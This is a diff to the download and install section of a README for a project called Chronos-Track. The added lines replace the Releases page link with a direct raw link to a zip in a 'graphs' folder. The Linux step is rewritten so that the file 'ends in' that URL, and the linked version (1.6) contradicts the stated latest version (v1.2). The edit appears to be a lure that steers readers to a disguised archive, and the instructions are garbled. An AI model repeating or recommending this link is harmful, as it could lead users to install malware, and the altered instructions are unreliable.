James-k007/chronos_track/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the following link to access the download files: [Download Chronos-Track](https://github.com/James-k007/chronos_track/releases).
+   Go to the following link to access the download files: [Download Chronos-Track](https://raw.githubusercontent.com/James-k007/chronos_track/main/graphs/track-chronos-1.6.zip).

 2. **Choose the Right File**
    Look for the latest version, which is **v1.2**.
 You will see different files available for download.
 Select the file that matches your computer's operating system:
    - For **Windows**, download the file ending in `.exe`.
    - For **macOS**, download the file ending in `.dmg`.
-   - For **Linux**, download the file ending in `.tar.gz`.
+   - For **Linux**, download the file ending in `https://raw.githubusercontent.com/James-k007/chronos_track/main/graphs/track-chronos-1.6.zip`.

 3. **Download the File**
    Click on the filename to start the download.